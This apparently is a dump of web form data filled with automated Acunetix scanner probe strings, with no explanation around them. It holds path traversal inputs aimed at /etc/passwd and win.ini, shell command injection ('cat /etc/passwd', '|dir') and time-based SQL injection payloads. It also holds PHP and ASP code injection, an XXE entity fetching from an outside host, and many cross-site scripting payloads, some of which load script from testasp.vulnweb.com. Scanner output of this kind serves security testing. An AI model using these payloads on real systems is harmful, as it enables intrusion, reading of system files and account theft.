unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9403051*9146829)

Mr.

'+response.write(9403051*9146829)+'

Mr.

"+response.write(9403051*9146829)+"

Mr.

${99464+99880}

response.write(9644625*9560143)

1

'+response.write(9644625*9560143)+'

1

"+response.write(9644625*9560143)+"

1

${99882+100056}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

1

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

'"()

1

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Mr.

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

Mr.

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

Mr.

1

http://www.acunetix.tst

1

Mr.

1

Mr.

1

Mr.

'"

Mr.

<!--

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(913953)</ScRiPt>

Mr.

1_987191

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

'|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.' and sleep(5.96)='

1

Mr.' and (sleep(5.96)+1) limit 1 --

1

Mr." and sleep(5.96)="

1

Mr." and sleep(5.96)="

1

Mr." and sleep(0)="

1

Mr." and sleep(2.98)="

1

Mr.' or (sleep(5.96)+1) limit 1 --

1

Mr." or (sleep(5.96)+1) limit 1 --

1

Mr.'=sleep(5.96)='

1

Mr."=sleep(5.96)="

1

Mr."=sleep(5.96)="

1

Mr."=sleep(0)="

1

Mr."=sleep(2.98)="

1

Mr.'+(select 1 from (select sleep(5.96))A)+'

1

Mr. and sleep(5.96)

1

Mr. or (sleep(5.96)+1) limit 1 --

1

Mr.';select pg_sleep(5.96); --

1

Mr.'; waitfor delay '0:0:5.96' --

1

Mr.'; waitfor delay '0:0:5.96' --

1

Mr.'; waitfor delay '0:0:0' --

1

Mr.'; waitfor delay '0:0:2.98' --

1

Mr."; waitfor delay '0:0:5.96' --

1

Mr."; waitfor delay '0:0:5.96' --

1

Mr."; waitfor delay '0:0:0' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@v0ydv

Mr.

JyI=

Mr.

'"

Mr.

''""

Mr.'"()&%<ScRiPt >prompt(951455)</ScRiPt>

1

Mr._956859

1

acu4071<s1﹥s2ʺs3ʹuca4071

1

acux1110z1z2abcxuca1110

1

Mr.<ScRiPt >prompt(947919)</ScRiPt>

1

Mr.<script>prompt(931603)</script>

1

Mr.<ScRiPt >prompt(953428)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985185></ScRiPt>

1

Mr.<ScRiPt >prompt(910063)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(946277)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950892)"></g></svg>

1

Mr.<div style=width:expression(prompt(990270))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='915520'>

1

Mr.<body onload=prompt(932321)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(901969)>

1

Mr.<img src=xyz OnErRor=prompt(996500)>

1

Mr.<img/src=">" onerror=alert(910365)>

1

Mr.%3CScRiPt%20%3Eprompt(911436)%3C/sCripT%3E

1

<img acu onmouseover=prompt(910100) //>

1

Mr.<input autofocus onfocus=prompt(996835)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._VnNOM <ScRiPt >prompt(963642)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@FWjtv

1

JyI=

1

'"

1

''""

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\